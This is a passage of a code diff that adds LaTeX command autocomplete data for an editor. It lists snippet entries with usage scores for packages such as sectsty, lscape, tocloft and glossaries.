0.05314494127699766, + }, + { + caption: '\\sectionfont{}', + snippet: '\\sectionfont{$1}', + meta: 'sectsty-cmd', + score: 0.003867941482301249, + }, + { + caption: '\\paragraph{}', + snippet: '\\paragraph{$1}', + meta: 'sectsty-cmd', + score: 0.152074250347974, + }, + { + caption: '\\allsectionsfont{}', + snippet: '\\allsectionsfont{$1}', + meta: 'sectsty-cmd', + score: 0.0011367198619746117, + }, + { + caption: '\\subsection{}', + snippet: '\\subsection{$1}', + meta: 'sectsty-cmd', + score: 1.3890912739512353, + }, + { + caption: '\\subsectionfont{}', + snippet: '\\subsectionfont{$1}', + meta: 'sectsty-cmd', + score: 0.002811633808315226, + }, + { + caption: '\\interlinepenalty', + snippet: '\\interlinepenalty', + meta: 
'sectsty-cmd', + score: 0.00032069955588347133, + }, + { + caption: '\\subsubsectionfont{}', + snippet: '\\subsubsectionfont{$1}', + meta: 'sectsty-cmd', + score: 0.0011363939259266408, + }, + { + caption: '\\underline{}', + snippet: '\\underline{$1}', + meta: 'sectsty-cmd', + score: 0.14748550887002482, + }, + { + caption: '\\subsubsection{}', + snippet: '\\subsubsection{$1}', + meta: 'sectsty-cmd', + score: 0.3727781330132016, + }, + { + caption: '\\section{}', + snippet: '\\section{$1}', + meta: 'sectsty-cmd', + score: 3.0952612541683835, + }, + ], + lscape: [ + { + caption: '\\csname', + snippet: '\\csname', + meta: 'lscape-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'lscape-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'lscape-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\scalebox{}{}', + snippet: '\\scalebox{$1}{$2}', + meta: 'lscape-cmd', + score: 0.015973401906548487, + }, + { + caption: '\\reflectbox{}', + snippet: '\\reflectbox{$1}', + meta: 'lscape-cmd', + score: 0.0005981923692899367, + }, + { + caption: '\\reflectbox', + snippet: '\\reflectbox', + meta: 'lscape-cmd', + score: 0.0005981923692899367, + }, + { + caption: '\\resizebox{}{}{}', + snippet: '\\resizebox{$1}{$2}{$3}', + meta: 'lscape-cmd', + score: 0.017834153815870245, + }, + { + caption: '\\includegraphics[]{}', + snippet: '\\includegraphics[$1]{$2}', + meta: 'lscape-cmd', + score: 1.4595731795525781, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'lscape-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\DeclareGraphicsExtensions{}', + snippet: '\\DeclareGraphicsExtensions{$1}', + meta: 'lscape-cmd', + score: 0.0055519509468004175, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'lscape-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\graphicspath{}', + snippet: '\\graphicspath{$1}', + meta: 'lscape-cmd', + score: 0.09973951908678011, + }, + { + caption: '\\rotatebox{}{}', + snippet: '\\rotatebox{$1}{$2}', + meta: 'lscape-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox[]{}{}', + snippet: '\\rotatebox[$1]{$2}{$3}', + meta: 'lscape-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\rotatebox{}', + snippet: '\\rotatebox{$1}', + meta: 'lscape-cmd', + score: 0.004719094298848707, + }, + { + caption: '\\DeclareGraphicsRule{}{}{}{}', + snippet: '\\DeclareGraphicsRule{$1}{$2}{$3}{$4}', + meta: 'lscape-cmd', + score: 0.004649150613625593, + }, + ], + hyphenat: [ + { + caption: '\\hyp{}', + snippet: '\\hyp{$1}', + meta: 'hyphenat-cmd', + score: 0.0013359874951570454, + }, + ], + tocloft: [ + { + caption: '\\cftsecleader', + snippet: '\\cftsecleader', + meta: 'tocloft-cmd', + score: 0.0011340882025681251, + }, + { + caption: '\\cftloftitlefont', + snippet: '\\cftloftitlefont', + meta: 'tocloft-cmd', + score: 6.2350576842596716e-6, + }, + { + caption: '\\cftchappresnum{}', + snippet: '\\cftchappresnum{$1}', + meta: 'tocloft-cmd', + score: 2.8671864736205568e-5, + }, + { + caption: '\\cftchappresnum', + snippet: '\\cftchappresnum', + meta: 'tocloft-cmd', + score: 2.8671864736205568e-5, + }, + { + caption: '\\listoftables', + snippet: '\\listoftables', + meta: 'tocloft-cmd', + score: 0.02104656820469027, + }, + { + caption: '\\cftsecfont{}', + snippet: '\\cftsecfont{$1}', + meta: 'tocloft-cmd', + score: 5.630015640183448e-5, + }, + { + caption: '\\cftchapfont{}', + snippet: '\\cftchapfont{$1}', + 
meta: 'tocloft-cmd', + score: 6.253521408609416e-5, + }, + { + caption: '\\cftchapfont', + snippet: '\\cftchapfont', + meta: 'tocloft-cmd', + score: 6.253521408609416e-5, + }, + { + caption: '\\cftsubsecleader', + snippet: '\\cftsubsecleader', + meta: 'tocloft-cmd', + score: 1.0644172549700836e-5, + }, + { + caption: '\\cftchapleader', + snippet: '\\cftchapleader', + meta: 'tocloft-cmd', + score: 1.0644172549700836e-5, + }, + { + caption: '\\tocloftpagestyle{}', + snippet: '\\tocloftpagestyle{$1}', + meta: 'tocloft-cmd', + score: 8.392451158032374e-5, + }, + { + caption: '\\cfttoctitlefont', + snippet: '\\cfttoctitlefont', + meta: 'tocloft-cmd', + score: 6.877027177035383e-5, + }, + { + caption: '\\cftdot', + snippet: '\\cftdot', + meta: 'tocloft-cmd', + score: 1.6201749367686227e-5, + }, + { + caption: '\\cftsecdotsep', + snippet: '\\cftsecdotsep', + meta: 'tocloft-cmd', + score: 0.0029383990986223767, + }, + { + caption: '\\cftafterloftitle', + snippet: '\\cftafterloftitle', + meta: 'tocloft-cmd', + score: 6.2350576842596716e-6, + }, + { + caption: '\\listoffigures', + snippet: '\\listoffigures', + meta: 'tocloft-cmd', + score: 0.03447318897846567, + }, + { + caption: '\\cftdotfill{}', + snippet: '\\cftdotfill{$1}', + meta: 'tocloft-cmd', + score: 0.006027562229085753, + }, + { + caption: '\\tableofcontents', + snippet: '\\tableofcontents', + meta: 'tocloft-cmd', + score: 0.13360595130994957, + }, + { + caption: '\\cftdotsep', + snippet: '\\cftdotsep', + meta: 'tocloft-cmd', + score: 0.003089163130463376, + }, + { + caption: '\\numberline{}', + snippet: '\\numberline{$1}', + meta: 'tocloft-cmd', + score: 0.007461440567272885, + }, + { + caption: '\\cftlottitlefont', + snippet: '\\cftlottitlefont', + meta: 'tocloft-cmd', + score: 6.2350576842596716e-6, + }, + { + caption: '\\cftchappagefont{}', + snippet: '\\cftchappagefont{$1}', + meta: 'tocloft-cmd', + score: 5.630015640183448e-5, + }, + { + caption: '\\cftsetindents{}{}{}', + snippet: '\\cftsetindents{$1}{$2}{$3}', + meta: 'tocloft-cmd', + score: 0.00043647269161217853, + }, + { + caption: '\\cftsecpagefont{}', + snippet: '\\cftsecpagefont{$1}', + meta: 'tocloft-cmd', + score: 5.630015640183448e-5, + }, + { + caption: '\\phantomsection', + snippet: '\\phantomsection', + meta: 'tocloft-cmd', + score: 0.0174633138331273, + }, + { + caption: '\\cftaftertoctitle', + snippet: '\\cftaftertoctitle', + meta: 'tocloft-cmd', + score: 6.2350576842596716e-6, + }, + { + caption: '\\cftafterlottitle', + snippet: '\\cftafterlottitle', + meta: 'tocloft-cmd', + score: 6.2350576842596716e-6, + }, + { + caption: '\\newlistof{}{}{}', + snippet: '\\newlistof{$1}{$2}{$3}', + meta: 'tocloft-cmd', + score: 0.0005381264966408724, + }, + ], + glossaries: [ + { + caption: '\\glslongpluralkey', + snippet: '\\glslongpluralkey', + meta: 'glossaries-cmd', + score: 1.4538687447297259e-5, + }, + { + caption: '\\Glspl{}', + snippet: '\\Glspl{$1}', + meta: 'glossaries-cmd', + score: 0.0025291265119320736, + }, + { + caption: '\\glossarysection', + snippet: '\\glossarysection', + meta: 'glossaries-cmd', + score: 9.579755294730752e-5, + }, + { + caption: '\\printglossaries', + snippet: '\\printglossaries', + meta: 'glossaries-cmd', + score: 0.0010106582768889887, + }, + { + caption: '\\Gls{}', + snippet: '\\Gls{$1}', + meta: 'glossaries-cmd', + score: 0.003696678698317109, + }, + { + caption: '\\setglossarystyle{}', + snippet: '\\setglossarystyle{$1}', + meta: 'glossaries-cmd', + score: 0.0003758893277679221, + }, + { + caption: '\\printglossary', + snippet: 
'\\printglossary', + meta: 'glossaries-cmd', + score: 0.009139682306158714, + }, + { + caption: '\\printglossary[]', + snippet: '\\printglossary[$1]', + meta: 'glossaries-cmd', + score: 0.009139682306158714, + }, + { + caption: '\\do', + snippet: '\\do', + meta: 'glossaries-cmd', + score: 0.009278344180101056, + }, + { + caption: '\\setglossarysection{}', + snippet: '\\setglossarysection{$1}', + meta: 'glossaries-cmd', + score: 3.6081414102781514e-5, + }, + { + caption: '\\glsresetall', + snippet: '\\glsresetall', + meta: 'glossaries-cmd', + score: 0.0006123462672467326, + }, + { + caption: '\\the', + snippet: '\\the', + meta: 'glossaries-cmd', + score: 0.007238960303946444, + }, + { + caption: '\\acrshort{}', + snippet: '\\acrshort{$1}', + meta: 'glossaries-cmd', + score: 0.009936841864059727, + }, + { + caption: '\\printnoidxglossary[]', + snippet: '\\printnoidxglossary[$1]', + meta: 'glossaries-cmd', + score: 0.00021912375285685037, + }, + { + caption: '\\newglossary{}{}', + snippet: '\\newglossary{$1}{$2}', + meta: 'glossaries-cmd', + score: 1.4547244650032571e-5, + }, + { + caption: '\\gls{}', + snippet: '\\gls{$1}', + meta: 'glossaries-cmd', + score: 0.06939353309055077, + }, + { + caption: '\\printnoidxglossaries', + snippet: '\\printnoidxglossaries', + meta: 'glossaries-cmd', + score: 5.6789564226023136e-5, + }, + { + caption: '\\printindex', + snippet: '\\printindex', + meta: 'glossaries-cmd', + score: 0.004417016910870522, + }, + { + caption: '\\defglsentryfmt[]{}', + snippet: '\\defglsentryfmt[$1]{$2}', + meta: 'glossaries-cmd', + score: 4.8990621725283124e-5, + }, + { + caption: '\\glspostdescription', + snippet: '\\glspostdescription', + meta: 'glossaries-cmd', + score: 0.0006337376579591112, + }, + { + caption: '\\number', + snippet: '\\number', + meta: 'glossaries-cmd', + score: 0.000968714260809983, + }, + { + caption: '\\glsaddall', + snippet: '\\glsaddall', + meta: 'glossaries-cmd', + score: 0.0008363820557740373, + }, + { + caption: '\\glsaddall[]', + snippet: '\\glsaddall[$1]', + meta: 'glossaries-cmd', + score: 0.0008363820557740373, + }, + { + caption: '\\makeglossaries', + snippet: '\\makeglossaries', + meta: 'glossaries-cmd', + score: 0.0056737600836936995, + }, + { + caption: '\\glossaryname', + snippet: '\\glossaryname', + meta: 'glossaries-cmd', + score: 0.0006174536302752427, + }, + { + caption: '\\newglossaryentry{}{}', + snippet: '\\newglossaryentry{$1}{$2}', + meta: 'glossaries-cmd', + score: 0.018524394136900962, + }, + { + caption: '\\glslabel', + snippet: '\\glslabel', + meta: 'glossaries-cmd', + score: 4.8990621725283124e-5, + }, + { + caption: '\\glsadd{}', + snippet: '\\glsadd{$1}', + meta: 'glossaries-cmd', + score: 3.0150373480213892e-5, + }, + { + caption: '\\makenoidxglossaries', + snippet: '\\makenoidxglossaries', + meta: 'glossaries-cmd', + score: 0.0001382210125680805, + }, + { + caption: '\\glsgenentryfmt', + snippet: '\\glsgenentryfmt', + meta: 'glossaries-cmd', + score: 4.8990621725283124e-5, + }, + { + caption: '\\acronymtype', + snippet: '\\acronymtype', + meta: 'glossaries-cmd', + score: 0.002000834271117562, + }, + { + caption: '\\acrfull{}', + snippet: '\\acrfull{$1}', + meta: 'glossaries-cmd', + score: 0.0032622587277765067, + }, + { + caption: '\\newacronym{}{}{}', + snippet: '\\newacronym{$1}{$2}{$3}', + meta: 'glossaries-cmd', + score: 0.03193935544723102, + }, + { + caption: '\\glspl{}', + snippet: '\\glspl{$1}', + meta: 'glossaries-cmd', + score: 0.0034025897522047717, + }, + { + caption: '\\ifglsused{}{}{}', + snippet: 
'\\ifglsused{$1}{$2}{$3}', + meta: 'glossaries-cmd', + score: 4.8990621725283124e-5, + }, + { + caption: '\\acrlong{}', + snippet: '\\acrlong{$1}', + meta: 'glossaries-cmd', + score: 0.002517821598213752, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'glossaries-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'glossaries-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'glossaries-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'glossaries-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\longmapsto', + snippet: '\\longmapsto', + meta: 'glossaries-cmd', + score: 0.0017755897148012264, + }, + { + caption: '\\Check{}', + snippet: '\\Check{$1}', + meta: 'glossaries-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\numberwithin{}{}', + snippet: '\\numberwithin{$1}{$2}', + meta: 'glossaries-cmd', + score: 0.006963729684667191, + }, + { + caption: '\\do', + snippet: '\\do', + meta: 'glossaries-cmd', + score: 0.009278344180101056, + }, + { + caption: '\\iff', + snippet: '\\iff', + meta: 'glossaries-cmd', + score: 0.004209937150980285, + }, + { + caption: '\\And', + snippet: '\\And', + meta: 'glossaries-cmd', + score: 0.0011582952152188854, + }, + { + caption: '\\And{}', + snippet: '\\And{$1}', + meta: 'glossaries-cmd', + score: 0.0011582952152188854, + }, + { + caption: '\\oint', + snippet: '\\oint', + meta: 'glossaries-cmd', + score: 0.0028650540724050534, + }, + { + caption: '\\boxed{}', + snippet: '\\boxed{$1}', + meta: 'glossaries-cmd', + score: 0.0035536135737312827, + }, + { + caption: '\\Ddot{}', + snippet: '\\Ddot{$1}', + meta: 'glossaries-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\ignorespacesafterend', + snippet: '\\ignorespacesafterend', + meta: 'glossaries-cmd', + score: 0.0010893680553454854, + }, + { + caption: '\\nonumber', + snippet: '\\nonumber', + meta: 'glossaries-cmd', + score: 0.051980653969641216, + }, + { + caption: '\\Breve{}', + snippet: '\\Breve{$1}', + meta: 'glossaries-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\mapsto', + snippet: '\\mapsto', + meta: 'glossaries-cmd', + score: 0.006473769486518971, + }, + { + caption: '\\over{}', + snippet: '\\over{$1}', + meta: 'glossaries-cmd', + score: 0.0054372322008878786, + }, + { + caption: '\\over', + snippet: '\\over', + meta: 'glossaries-cmd', + score: 0.0054372322008878786, + }, + { + caption: '\\bigotimes', + snippet: '\\bigotimes', + meta: 'glossaries-cmd', + score: 0.000984722260624791, + }, + { + caption: '\\bigoplus', + snippet: '\\bigoplus', + meta: 'glossaries-cmd', + score: 0.0011508785476242003, + }, + { + caption: '\\theequation', + snippet: '\\theequation', + meta: 'glossaries-cmd', + score: 0.002995924112493351, + }, + { + caption: '\\bigcap', + snippet: '\\bigcap', + meta: 'glossaries-cmd', + score: 0.005709261168797874, + }, + { + caption: '\\xrightarrow{}', + snippet: '\\xrightarrow{$1}', + meta: 'glossaries-cmd', + score: 0.004163642482777231, + }, + { + caption: '\\xrightarrow[]{}', + snippet: '\\xrightarrow[$1]{$2}', + meta: 'glossaries-cmd', + score: 0.004163642482777231, + }, + { + caption: '\\atop', + snippet: '\\atop', + meta: 'glossaries-cmd', + score: 0.0006518541515279979, + }, + { + caption: '\\dfrac{}{}', + snippet: '\\dfrac{$1}{$2}', + meta: 'glossaries-cmd', + score: 0.05397545277891961, + }, + { + caption: '\\pmod', + 
snippet: '\\pmod', + meta: 'glossaries-cmd', + score: 0.0011773327219377148, + }, + { + caption: '\\pmod{}', + snippet: '\\pmod{$1}', + meta: 'glossaries-cmd', + score: 0.0011773327219377148, + }, + { + caption: '\\notag', + snippet: '\\notag', + meta: 'glossaries-cmd', + score: 0.00322520920930312, + }, + { + caption: '\\int', + snippet: '\\int', + meta: 'glossaries-cmd', + score: 0.11946660537765894, + }, + { + caption: '\\Vec{}', + snippet: '\\Vec{$1}', + meta: 'glossaries-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\bigvee', + snippet: '\\bigvee', + meta: 'glossaries-cmd', + score: 0.0011677288242806726, + }, + { + caption: '\\sum', + snippet: '\\sum', + meta: 'glossaries-cmd', + score: 0.42607994509619934, + }, + { + caption: '\\hookrightarrow', + snippet: '\\hookrightarrow', + meta: 'glossaries-cmd', + score: 0.0015607282046545064, + }, + { + caption: '\\bigsqcup', + snippet: '\\bigsqcup', + meta: 'glossaries-cmd', + score: 0.0003468284144579442, + }, + { + caption: '\\hookleftarrow', + snippet: '\\hookleftarrow', + meta: 'glossaries-cmd', + score: 0.0016498799924012809, + }, + { + caption: '\\Dot{}', + snippet: '\\Dot{$1}', + meta: 'glossaries-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\dots', + snippet: '\\dots', + meta: 'glossaries-cmd', + score: 0.0847414497955395, + }, + { + caption: '\\genfrac{}{}{}{}{}{}', + snippet: '\\genfrac{$1}{$2}{$3}{$4}{$5}{$6}', + meta: 'glossaries-cmd', + score: 0.004820143328295316, + }, + { + caption: '\\genfrac', + snippet: '\\genfrac', + meta: 'glossaries-cmd', + score: 0.004820143328295316, + }, + { + caption: '\\cfrac{}{}', + snippet: '\\cfrac{$1}{$2}', + meta: 'glossaries-cmd', + score: 0.006765684097139381, + }, + { + caption: '\\Acute{}', + snippet: '\\Acute{$1}', + meta: 'glossaries-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\ldots', + snippet: '\\ldots', + meta: 'glossaries-cmd', + score: 0.11585556755884258, + }, + { + caption: '\\coprod', + snippet: '\\coprod', + meta: 'glossaries-cmd', + score: 0.00011383372700282614, + }, + { + caption: '\\impliedby', + snippet: '\\impliedby', + meta: 'glossaries-cmd', + score: 2.3482915591834053e-5, + }, + { + caption: '\\big', + snippet: '\\big', + meta: 'glossaries-cmd', + score: 0.05613164277964739, + }, + { + caption: '\\idotsint', + snippet: '\\idotsint', + meta: 'glossaries-cmd', + score: 1.3908704929884828e-5, + }, + { + caption: '\\Longrightarrow', + snippet: '\\Longrightarrow', + meta: 'glossaries-cmd', + score: 0.002459139437356601, + }, + { + caption: '\\allowdisplaybreaks', + snippet: '\\allowdisplaybreaks', + meta: 'glossaries-cmd', + score: 0.005931777024772073, + }, + { + caption: '\\eqref{}', + snippet: '\\eqref{$1}', + meta: 'glossaries-cmd', + score: 0.06345266254167037, + }, + { + caption: '\\mod', + snippet: '\\mod', + meta: 'glossaries-cmd', + score: 0.0015181439193121889, + }, + { + caption: '\\mod{}', + snippet: '\\mod{$1}', + meta: 'glossaries-cmd', + score: 0.0015181439193121889, + }, + { + caption: '\\arraystretch', + snippet: '\\arraystretch', + meta: 'glossaries-cmd', + score: 0.022224283488673075, + }, + { + caption: '\\arraystretch{}', + snippet: '\\arraystretch{$1}', + meta: 'glossaries-cmd', + score: 0.022224283488673075, + }, + { + caption: '\\bigg', + snippet: '\\bigg', + meta: 'glossaries-cmd', + score: 0.04318078602869565, + }, + { + caption: '\\underset{}{}', + snippet: '\\underset{$1}{$2}', + meta: 'glossaries-cmd', + score: 0.012799893214578391, + }, + { + caption: '\\dotsc', + snippet: '\\dotsc', + meta: 
'glossaries-cmd', + score: 0.0008555101484119994, + }, + { + caption: '\\doteq', + snippet: '\\doteq', + meta: 'glossaries-cmd', + score: 3.164631070474435e-5, + }, + { + caption: '\\leftroot{}', + snippet: '\\leftroot{$1}', + meta: 'glossaries-cmd', + score: 6.625561928497235e-5, + }, + { + caption: '\\substack{}', + snippet: '\\substack{$1}', + meta: 'glossaries-cmd', + score: 0.0037482529712850755, + }, + { + caption: '\\Hat{}', + snippet: '\\Hat{$1}', + meta: 'glossaries-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\frac{}{}', + snippet: '\\frac{$1}{$2}', + meta: 'glossaries-cmd', + score: 1.4341091141105058, + }, + { + caption: '\\mspace{}', + snippet: '\\mspace{$1}', + meta: 'glossaries-cmd', + score: 3.423236656565836e-5, + }, + { + caption: '\\Bar{}', + snippet: '\\Bar{$1}', + meta: 'glossaries-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\Grave{}', + snippet: '\\Grave{$1}', + meta: 'glossaries-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\implies', + snippet: '\\implies', + meta: 'glossaries-cmd', + score: 0.021828316911576096, + }, + { + caption: '\\tbinom', + snippet: '\\tbinom', + meta: 'glossaries-cmd', + score: 1.3908704929884828e-5, + }, + { + caption: '\\dotsi', + snippet: '\\dotsi', + meta: 'glossaries-cmd', + score: 2.7817409859769657e-5, + }, + { + caption: '\\bigwedge', + snippet: '\\bigwedge', + meta: 'glossaries-cmd', + score: 0.000347742918592393, + }, + { + caption: '\\sideset{}{}', + snippet: '\\sideset{$1}{$2}', + meta: 'glossaries-cmd', + score: 5.563481971953931e-5, + }, + { + caption: '\\smash{}', + snippet: '\\smash{$1}', + meta: 'glossaries-cmd', + score: 0.008197171096663127, + }, + { + caption: '\\smash[]{}', + snippet: '\\smash[$1]{$2}', + meta: 'glossaries-cmd', + score: 0.008197171096663127, + }, + { + caption: '\\colon', + snippet: '\\colon', + meta: 'glossaries-cmd', + score: 0.005300291684408929, + }, + { + caption: '\\intertext{}', + snippet: '\\intertext{$1}', + meta: 'glossaries-cmd', + score: 0.0016148076375871775, + }, + { + caption: '\\Longleftarrow', + snippet: '\\Longleftarrow', + meta: 'glossaries-cmd', + score: 8.477207854183949e-5, + }, + { + caption: '\\prod', + snippet: '\\prod', + meta: 'glossaries-cmd', + score: 0.02549889375975901, + }, + { + caption: '\\AmS', + snippet: '\\AmS', + meta: 'glossaries-cmd', + score: 0.00047859486202980376, + }, + { + caption: '\\overline{}', + snippet: '\\overline{$1}', + meta: 'glossaries-cmd', + score: 0.11280487530505384, + }, + { + caption: '\\tfrac{}{}', + snippet: '\\tfrac{$1}{$2}', + meta: 'glossaries-cmd', + score: 0.0005923542426657187, + }, + { + caption: '\\uproot{}', + snippet: '\\uproot{$1}', + meta: 'glossaries-cmd', + score: 6.625561928497235e-5, + }, + { + caption: '\\bmod', + snippet: '\\bmod', + meta: 'glossaries-cmd', + score: 0.002022594681005002, + }, + { + caption: '\\bmod{}', + snippet: '\\bmod{$1}', + meta: 'glossaries-cmd', + score: 0.002022594681005002, + }, + { + caption: '\\pod{}', + snippet: '\\pod{$1}', + meta: 'glossaries-cmd', + score: 2.7817409859769657e-5, + }, + { + caption: '\\label{}', + snippet: '\\label{$1}', + meta: 'glossaries-cmd', + score: 1.897791904799601, + }, + { + caption: '\\longrightarrow', + snippet: '\\longrightarrow', + meta: 'glossaries-cmd', + score: 0.013399422292458848, + }, + { + caption: '\\xleftarrow[]{}', + snippet: '\\xleftarrow[$1]{$2}', + meta: 'glossaries-cmd', + score: 3.5779964196240445e-5, + }, + { + caption: '\\xleftarrow{}', + snippet: '\\xleftarrow{$1}', + meta: 'glossaries-cmd', + score: 
3.5779964196240445e-5, + }, + { + caption: '\\mathaccentV', + snippet: '\\mathaccentV', + meta: 'glossaries-cmd', + score: 6.216218551413489e-5, + }, + { + caption: '\\hdotsfor{}', + snippet: '\\hdotsfor{$1}', + meta: 'glossaries-cmd', + score: 0.00024247684499275043, + }, + { + caption: '\\hdotsfor[]{}', + snippet: '\\hdotsfor[$1]{$2}', + meta: 'glossaries-cmd', + score: 0.00024247684499275043, + }, + { + caption: '\\Bigg', + snippet: '\\Bigg', + meta: 'glossaries-cmd', + score: 0.015507614799858266, + }, + { + caption: '\\Bigg[]', + snippet: '\\Bigg[$1]', + meta: 'glossaries-cmd', + score: 0.015507614799858266, + }, + { + caption: '\\overset{}{}', + snippet: '\\overset{$1}{$2}', + meta: 'glossaries-cmd', + score: 0.007611544955294224, + }, + { + caption: '\\Big', + snippet: '\\Big', + meta: 'glossaries-cmd', + score: 0.050370758781422345, + }, + { + caption: '\\longleftrightarrow', + snippet: '\\longleftrightarrow', + meta: 'glossaries-cmd', + score: 0.0002851769278703356, + }, + { + caption: '\\Longleftrightarrow', + snippet: '\\Longleftrightarrow', + meta: 'glossaries-cmd', + score: 0.0004896780659212191, + }, + { + caption: '\\Longleftrightarrow{}', + snippet: '\\Longleftrightarrow{$1}', + meta: 'glossaries-cmd', + score: 0.0004896780659212191, + }, + { + caption: '\\binom{}{}', + snippet: '\\binom{$1}{$2}', + meta: 'glossaries-cmd', + score: 0.013010882180364367, + }, + { + caption: '\\longleftarrow', + snippet: '\\longleftarrow', + meta: 'glossaries-cmd', + score: 0.0011096532692473691, + }, + { + caption: '\\dbinom{}{}', + snippet: '\\dbinom{$1}{$2}', + meta: 'glossaries-cmd', + score: 0.006800272303210672, + }, + { + caption: '\\Tilde{}', + snippet: '\\Tilde{$1}', + meta: 'glossaries-cmd', + score: 7.874446783586035e-5, + }, + { + caption: '\\bigcup', + snippet: '\\bigcup', + meta: 'glossaries-cmd', + score: 0.0058847868741168765, + }, + { + caption: '\\sinh', + snippet: '\\sinh', + meta: 'glossaries-cmd', + score: 0.0006435164702005918, + }, + { + caption: '\\sinh{}', + snippet: '\\sinh{$1}', + meta: 'glossaries-cmd', + score: 0.0006435164702005918, + }, + { + caption: '\\operatorname{}', + snippet: '\\operatorname{$1}', + meta: 'glossaries-cmd', + score: 0.02181954887028883, + }, + { + caption: '\\max', + snippet: '\\max', + meta: 'glossaries-cmd', + score: 0.04116833357968482, + }, + { + caption: '\\liminf', + snippet: '\\liminf', + meta: 'glossaries-cmd', + score: 0.0015513861600956144, + }, + { + caption: '\\liminf{}', + snippet: '\\liminf{$1}', + meta: 'glossaries-cmd', + score: 0.0015513861600956144, + }, + { + caption: '\\operatornamewithlimits{}', + snippet: '\\operatornamewithlimits{$1}', + meta: 'glossaries-cmd', + score: 0.0022415507993352067, + }, + { + caption: '\\exp', + snippet: '\\exp', + meta: 'glossaries-cmd', + score: 0.02404262443651467, + }, + { + caption: '\\exp{}', + snippet: '\\exp{$1}', + meta: 'glossaries-cmd', + score: 0.02404262443651467, + }, + { + caption: '\\lim', + snippet: '\\lim', + meta: 'glossaries-cmd', + score: 0.05285123457928509, + }, + { + caption: '\\sin', + snippet: '\\sin', + meta: 'glossaries-cmd', + score: 0.040463088537699636, + }, + { + caption: '\\sin{}', + snippet: '\\sin{$1}', + meta: 'glossaries-cmd', + score: 0.040463088537699636, + }, + { + caption: '\\arg', + snippet: '\\arg', + meta: 'glossaries-cmd', + score: 0.007190995792600074, + }, + { + caption: '\\cos', + snippet: '\\cos', + meta: 'glossaries-cmd', + score: 0.050370402546134785, + }, + { + caption: '\\cos{}', + snippet: '\\cos{$1}', + meta: 'glossaries-cmd', + score: 
0.050370402546134785, + }, + { + caption: '\\varliminf', + snippet: '\\varliminf', + meta: 'glossaries-cmd', + score: 6.204977642542802e-5, + }, + { + caption: '\\hom', + snippet: '\\hom', + meta: 'glossaries-cmd', + score: 8.180643329881783e-5, + }, + { + caption: '\\tan', + snippet: '\\tan', + meta: 'glossaries-cmd', + score: 0.006176447465423192, + }, + { + caption: '\\det', + snippet: '\\det', + meta: 'glossaries-cmd', + score: 0.005640718203101287, + }, + { + caption: '\\ln', + snippet: '\\ln', + meta: 'glossaries-cmd', + score: 0.025366949660913504, + }, + { + caption: '\\ln{}', + snippet: '\\ln{$1}', + meta: 'glossaries-cmd', + score: 0.025366949660913504, + }, + { + caption: '\\cosh', + snippet: '\\cosh', + meta: 'glossaries-cmd', + score: 0.0008896391580266903, + }, + { + caption: '\\cosh{}', + snippet: '\\cosh{$1}', + meta: 'glossaries-cmd', + score: 0.0008896391580266903, + }, + { + caption: '\\gcd', + snippet: '\\gcd', + meta: 'glossaries-cmd', + score: 0.002254008371792865, + }, + { + caption: '\\limsup', + snippet: '\\limsup', + meta: 'glossaries-cmd', + score: 0.002354950225950599, + }, + { + caption: '\\limsup{}', + snippet: '\\limsup{$1}', + meta: 'glossaries-cmd', + score: 0.002354950225950599, + }, + { + caption: '\\inf', + snippet: '\\inf', + meta: 'glossaries-cmd', + score: 0.00340470256994063, + }, + { + caption: '\\arccos', + snippet: '\\arccos', + meta: 'glossaries-cmd', + score: 0.001781687642431819, + }, + { + caption: '\\arccos{}', + snippet: '\\arccos{$1}', + meta: 'glossaries-cmd', + score: 0.001781687642431819, + }, + { + caption: '\\ker', + snippet: '\\ker', + meta: 'glossaries-cmd', + score: 0.002475379242338094, + }, + { + caption: '\\cot', + snippet: '\\cot', + meta: 'glossaries-cmd', + score: 0.0003640644365701238, + }, + { + caption: '\\cot{}', + snippet: '\\cot{$1}', + meta: 'glossaries-cmd', + score: 0.0003640644365701238, + }, + { + caption: '\\coth{}', + snippet: '\\coth{$1}', + meta: 'glossaries-cmd', + score: 0.00025939638266884963, + }, + { + caption: '\\coth', + snippet: '\\coth', + meta: 'glossaries-cmd', + score: 0.00025939638266884963, + }, + { + caption: '\\varlimsup', + snippet: '\\varlimsup', + meta: 'glossaries-cmd', + score: 6.204977642542802e-5, + }, + { + caption: '\\log', + snippet: '\\log', + meta: 'glossaries-cmd', + score: 0.048131780413380156, + }, + { + caption: '\\varinjlim', + snippet: '\\varinjlim', + meta: 'glossaries-cmd', + score: 0.000361814283649031, + }, + { + caption: '\\deg', + snippet: '\\deg', + meta: 'glossaries-cmd', + score: 0.005542465148816408, + }, + { + caption: '\\arctan', + snippet: '\\arctan', + meta: 'glossaries-cmd', + score: 0.0011971697553682045, + }, + { + caption: '\\dim', + snippet: '\\dim', + meta: 'glossaries-cmd', + score: 0.0038210003967178293, + }, + { + caption: '\\min', + snippet: '\\min', + meta: 'glossaries-cmd', + score: 0.03051120054363316, + }, + { + caption: '\\Pr', + snippet: '\\Pr', + meta: 'glossaries-cmd', + score: 0.010227440663206161, + }, + { + 